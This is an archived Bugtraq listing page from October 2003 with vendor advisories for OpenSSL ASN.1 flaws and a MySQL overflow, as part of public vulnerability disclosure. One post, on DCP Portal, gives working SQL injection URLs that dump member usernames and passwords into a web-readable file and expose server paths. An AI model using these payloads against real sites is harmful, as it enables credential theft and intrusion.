Computer Security Vulnerabilities

Daniel Ahlberg | 1 Oct 2003 16:48

Picon

GLSA: openssl (200309-19)


---------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT 200309-19
---------------------------------------------------------------------

          PACKAGE : openssl
          SUMMARY : vulnerabilities in ASN.1 parsing
             DATE : 2003-10-01 14:48 UTC
          EXPLOIT : remote
     GENTOO BUG # : 30001
              CVE : CAN-2003-0545 CAN-2003-0543 CAN-2003-0544

---------------------------------------------------------------------

DESCRIPTION

quote from OpenSSL advisory:

"1. Certain ASN.1 encodings that are rejected as invalid by the parser
can trigger a bug in the deallocation of the corresponding data
structure, corrupting the stack. This can be used as a denial of service
attack. It is currently unknown whether this can be exploited to run
malicious code. This issue does not affect OpenSSL 0.9.6.

2. Unusual ASN.1 tag values can cause an out of bounds read under
certain circumstances, resulting in a denial of service vulnerability.

3. A malformed public key in a certificate will crash the verify code if
it is set to ignore public key decoding errors. Public key decode errors
are not normally ignored, except for debugging purposes, so this is

(Continue reading)

Sebastian Krahmer | 1 Oct 2003 13:53

Picon

SuSE Security Announcement: mysql (SuSE-SA:2003:042)


______________________________________________________________________________

                        SuSE Security Announcement

        Package:                mysql
        Announcement-ID:        SuSE-SA:2003:042
        Date:                   Wed Oct  1 12:12:38 CEST 2003
        Affected products:      7.2, 7.3, 8.0, 8.1, 8.2
                                SuSE Linux Connectivity Server
                                SuSE Linux Enterprise Server 7, 8
                                SuSE Linux Office Server
                                UnitedLinux 1.0
        Vulnerability Type:     remote code execution
        Severity (1-10):        5
        SuSE default package:   no
        Cross References:       -

    Content of this advisory:
        1) security vulnerability resolved: Buffer overflow in mysql.
           problem description, discussion, solution and upgrade information
        2) pending vulnerabilities, solutions, workarounds:
            - OpenSSL
        3) standard appendix (further information)

______________________________________________________________________________

1)  problem description, brief discussion, solution, upgrade information

    A remotely exploitable buffer overflow within the authentication code

(Continue reading)

debian-security-announce | 1 Oct 2003 12:43

Picon

[Full-Disclosure] [SECURITY] [DSA-393-1] New OpenSSL packages correct denial of service issues


--------------------------------------------------------------------------
Debian Security Advisory DSA 393-1                     security <at> debian.org
http://www.debian.org/security/                              Michael Stone
October 1, 2003                         http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package        : openssl
Vulnerability  : denial of service
Problem-Type   : remote
Debian-specific: no
CVE Ids        : CAN-2003-0543 CAN-2003-0544

Dr. Stephen Henson (steve <at> openssl.org), using a test suite provided by
NISCC (www.niscc.gov.uk), discovered a number of errors in the OpenSSL
ASN1 code.  Combined with an error that causes the OpenSSL code to parse
client certificates even when it should not, these errors can cause a
denial of service (DoS) condition on a system using the OpenSSL code, 
depending on how that code is used. For example, even though apache-ssl
and ssh link to OpenSSL libraries, they should not be affected by this
vulnerability. However, other SSL-enabled applications may be
vulnerable and an OpenSSL upgrade is recommended.

For the current stable distribution (woody) these problems have been
fixed in version 0.9.6c-2.woody.4

For the unstable distribution (sid) these problems have been fixed in
version 0.9.7c-1

We recommend that you update your openssl package. Note that you will

(Continue reading)

Mandrake Linux Security Team | 1 Oct 2003 07:16

MDKSA-2003:098 - Updated openssl packages fix vulnerabilities


________________________________________________________________________

                Mandrake Linux Security Update Advisory
________________________________________________________________________

Package name:           openssl
Advisory ID:            MDKSA-2003:098
Date:                   September 30th, 2003

Affected versions:	8.2, 9.0, 9.1, 9.2, Corporate Server 2.1,
			Multi Network Firewall 8.2
________________________________________________________________________

Problem Description:

 Two bugs were discovered in OpenSSL 0.9.6 and 0.9.7 by NISCC. The
 parsing of unusual ASN.1 tag values can cause OpenSSL to crash, which
 could be triggered by a remote attacker by sending a carefully-crafted
 SSL client certificate to an application.  Depending upon the
 application targetted, the effects seen will vary; in some cases a DoS
 (Denial of Service) could be performed, in others nothing noticeable
 or adverse may happen.  These two vulnerabilities have been assigned
 CAN-2003-0543 and CAN-2003-0544.

 Additionally, NISCC discovered a third bug in OpenSSL 0.9.7.  Certain
 ASN.1 encodings that are rejected as invalid by the parser can trigger
 a bug in deallocation of a structure, leading to a double free.  This
 can be triggered by a remote attacker by sending a carefully-crafted
 SSL client certificate to an application.  This vulnerability may be

(Continue reading)

Slackware Security Team | 1 Oct 2003 07:48

[slackware-security] OpenSSL security update (SSA:2003-273-01)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security]  OpenSSL security update (SSA:2003-273-01)

Upgraded OpenSSL packages are available for Slackware 8.1, 9.0,
9.1, and -current.  These fix problems with ASN.1 parsing which
could lead to a denial of service.  It is not known whether the
problems could lead to the running of malicious code on the
server, but it has not been ruled out.

We recommend sites that use OpenSSL upgrade to the fixed packages
right away.

Here are the details from the Slackware 9.1 ChangeLog:
+--------------------------+
Tue Sep 30 16:16:35 PDT 2003
patches/packages/openssl-0.9.7c-i486-1.tgz:  Upgraded to OpenSSL 0.9.7c.
patches/packages/openssl-solibs-0.9.7c-i486-1.tgz:  Upgraded to OpenSSL 0.9.7c.
  This update fixes problems with OpenSSL's ASN.1 parsing which could lead to
  a denial of service.  It is not known whether the problems could lead to the
  running of malicious code on the server, but it has not been ruled out.
  For detailed information, see OpenSSL's security advisory:
    http://www.openssl.org/news/secadv_20030930.txt
  We recommend sites that use OpenSSL upgrade to the fixed packages right away.
  (* Security fix *)
+--------------------------+

WHERE TO FIND THE NEW PACKAGES:

(Continue reading)

Cisco Systems Product Security Incident Response Team | 1 Oct 2003 02:41

Picon

Cisco Security Advisory: SSL Implementation Vulnerabilities


          Cisco Security Advisory: SSL Implementation Vulnerabilities

Revision 1.0

  For Public Release 2003 September 30 at 2330 GMT

     ----------------------------------------------------------------------

Contents

     Summary
     Affected Products
     Details
     Impact
     Software Versions and Fixes
     Obtaining Fixed Software
     Workarounds
     Exploitation and Public Announcements
     Status of This Notice: INTERIM
     Distribution
     Revision History
     Cisco Security Procedures

     ----------------------------------------------------------------------

Summary

   New vulnerabilities in the OpenSSL implementation for SSL
   have been announced.

(Continue reading)

Lifo Fifo | 1 Oct 2003 14:08

Picon

DCP Portal - 5.5 holes


Never use this product if you have turned off magic_quotes_gpc. And this product won't work anyway if you
have turned off register_globals.

All the files in the product, dont check for integrity of variables. You can easily exploit this using some
SQL Injection techniques. For example, if you want to get username/password of all the users, you can
exploit advertiser.php. 

Open it like,

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select
uid,name,password,surname,job,email from dcp5_members into outfile 'c:/apache2/htdocs/dcpad.txt

This is for windows, if web-server is running on *nix, then you could enter something like,

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select
uid,name,password,surname,job,email from dcp5_members into outfile '/var/www/html/dcpad.txt

In this cases, you will need to enter the absolute path. For that, run the follwing

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=' and that will show the
path to the sever if they have turned on display_errors in php.ini.

That's all ! Notice that here we are using UNION function in query. For that, the host should be running
version MySQL 4.x. Well, if it's not running 4.x, No problem, we have another file !

This time it's lostpassword.php.

Open it like,

(Continue reading)

steve | 1 Oct 2003 10:06

Re: Local stackbased overflow found for silly Poker v0.25.5 (advisory + poc exploit)

On Wed, Oct 01, 2003 at 12:08:27AM +0200, demz wrote:

> Local stackbased overflow found in sill Poker v0.25.5
> silly Poker contains an $HOME environment variable stack overflow,
> this can be exploited very simple to execute arbitrary code with gid=games
> privileges.

  I reported this bug to the sillypoker mainter 12 days ago as you can
 see here:

 	http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=211611

  However your analysis is incorrect, sillypoker isn't installed
 setgid(games) upon either the Debian Stable or the Debian Unstable
 distribution.

Steve
--

dhtml | 1 Oct 2003 16:54

NINCOMPOOPERY OF MICROSOFT

"Hackers are criminals" Most, he notes, release their malicious code
after patches for Microsoft software have been released, meaning that
they are simply reverse engineering to exploit security weaknesses or
holes in software. - Microsoft CEO Steve Ballmer 

'ninkum`poop [n]  a stupid foolish person See Also: simple, simpleton

Microsoft has claimed that the majority of the security bugs reported
by the companys software users have been traced back to the code provided
by the third party software vendors

Almost 90 per cent of the problems, that are reported by the users as
part of our automated feedback system, come from the code that is not
provided by Microsoft. - Chief Technology Officer Craig Mundie 

http://www.internetwk.com/breakingNews/showArticle.jhtml?articleID=15200897

http://www.financialexpress.com/fe_full_story.php?content_id=43039

BG

Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

(Continue reading)

Thomas Biege | 1 Oct 2003 19:19

Picon

SuSE Security Announcement: openssl (SuSE-SA:2003:043)


______________________________________________________________________________

                        SuSE Security Announcement

        Package:                openssl
        Announcement-ID:        SuSE-SA:2003:043
        Date:                   Wednesday, Oct 1st 2003 16:12 MET
        Affected products:      7.2, 7.3, 8.0, 8.1, 8.2, 9.0
                                SuSE Linux Database Server,
                                SuSE eMail Server III, 3.1
                                SuSE Linux Enterprise Server 7/8,
                                SuSE Linux Firewall on CD/Admin host
                                SuSE Linux Connectivity Server
                                SuSE Linux Office Server
        Vulnerability Type:     remote denial-of-service
        Severity (1-10):        5
        SuSE default package:   yes
        Cross References:       CAN-2003-0543
                                CAN-2003-0544
                                CAN-2003-0545

    Content of this advisory:
        1) security vulnerability resolved:
            - problems with ASN.1 encoding
            - accepting client certificates even if disabled
           problem description, discussion, solution and upgrade information
        2) pending vulnerabilities, solutions, workarounds:
            - whois
            - gdm2

(Continue reading)

Group

gmane.comp.security.bugtraq.

Advertisement

Search Archive

Page

1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 47

Articles in period: 460

October 2003

Language

Change language

Options

Current view: Threads only / Showing only 20 lines / Not hiding cited text.
Change to All messages, whole messages, or hide cited text.

Post a message
NNTP Newsgroup
Classic Gmane web interface
XML

XML

RSS Feed
List Information

About Gmane

Recent entries

[SECURITY] [DSA 2628-2] nss-pam-ldapd update (18 Jun 2013)
[SECURITY] [DSA 2698-1] tiff security update (18 Jun 2013)
APPLE-SA-2013-06-18-1 Java for OS X 2013-004 and Mac OS X v10.6 Update (18 Jun 2013)
[SECURITY] [DSA 2710-1] xml-security-c security update (18 Jun 2013)
FreeBSD Security Advisory FreeBSD-SA-13:06.mmap (18 Jun 2013)
[security bulletin] HPSBHF02885 rev.2 - HP Integrated Lights-Out iLO3 (17 Jun 2013)
LSE Leading Security Experts GmbH - LSE-2013-06-13 - Avira AntiVir Eng (13 Jun 2013)
[ MDVSA-2013:173 ] subversion (13 Jun 2013)
[SECURITY] [DSA 2707-1] dbus security update (13 Jun 2013)
[ MDVSA-2013:172 ] wireshark (12 Jun 2013)
SQL Injection in Dolphin (12 Jun 2013)
[security bulletin] HPSBMU02884 rev.1 - HP Service Manager and HP Serv (11 Jun 2013)
t2'13: Call for Papers 2013 (Helsinki / Finland) (11 Jun 2013)
[security bulletin] HPSBHF02885 rev.1 - HP Integrated Lights-Out iLO3 (11 Jun 2013)
[SECURITY] [DSA 2706-1] chromium-browser security update (10 Jun 2013)
[SECURITY] [DSA 2705-1] pymongo security update (10 Jun 2013)
[SECURITY] [DSA 2704-1] mesa security update (9 Jun 2013)
[SECURITY] [DSA 2703-1] subversion security update (9 Jun 2013)
Bluetooth Chat Connect v1.0 iOS - Multiple Vulnerabilities (9 Jun 2013)
Fail2ban 0.8.9, Denial of Service (Apache rules only) (8 Jun 2013)
Netgear FVG318 is vunerable to DOS attack (8 Jun 2013)

Archives

43	June 2013
111	May 2013
230	April 2013
130	March 2013
135	February 2013
97	January 2013
104	December 2012
97	November 2012
125	October 2012
105	September 2012
147	August 2012
131	July 2012
129	June 2012
128	May 2012
188	April 2012
161	March 2012
134	February 2012
136	January 2012
155	December 2011
155	November 2011
151	October 2011
160	September 2011
159	August 2011
157	July 2011
117	June 2011
152	May 2011
212	April 2011
250	March 2011
158	February 2011
145	January 2011
216	December 2010
171	November 2010
221	October 2010
161	September 2010
269	August 2010
223	July 2010
178	June 2010
254	May 2010
186	April 2010
186	March 2010
160	February 2010
209	January 2010
256	December 2009
146	November 2009
261	October 2009
249	September 2009
271	August 2009
279	July 2009
284	June 2009
325	May 2009
316	April 2009
295	March 2009
255	February 2009
320	January 2009
273	December 2008
254	November 2008
284	October 2008
362	September 2008
323	August 2008
317	July 2008
249	June 2008
379	May 2008
344	April 2008
425	March 2008
477	February 2008
452	January 2008
385	December 2007
473	November 2007
491	October 2007
435	September 2007
517	August 2007
410	July 2007
412	June 2007
451	May 2007
511	April 2007
510	March 2007
579	February 2007
685	January 2007
464	December 2006
611	November 2006
568	October 2006
564	September 2006
606	August 2006
610	July 2006
796	June 2006
725	May 2006
628	April 2006
659	March 2006
602	February 2006
613	January 2006
415	December 2005
430	November 2005
441	October 2005
441	September 2005
473	August 2005
595	July 2005
366	June 2005
394	May 2005
568	April 2005
595	March 2005
567	February 2005
426	January 2005
536	December 2004
489	November 2004
396	October 2004
480	September 2004
439	August 2004
406	July 2004
527	June 2004
369	May 2004
456	April 2004
441	March 2004
730	February 2004
470	January 2004
372	December 2003
448	November 2003
460	October 2003
679	September 2003
477	August 2003
487	July 2003
282	June 2003
394	May 2003
425	April 2003
510	March 2003
411	February 2003
445	January 2003
287	December 2002
427	November 2002
453	October 2002
366	September 2002
407	August 2002
450	July 2002
379	June 2002
298	May 2002
426	April 2002
292	March 2002
1	December 2001
2	July 2001
1	July 2000
2	January 2000

Design

Zawodny | Right Menu | Left Menu

Your Own Design

Paste the URL of your CSS below. Download CSS template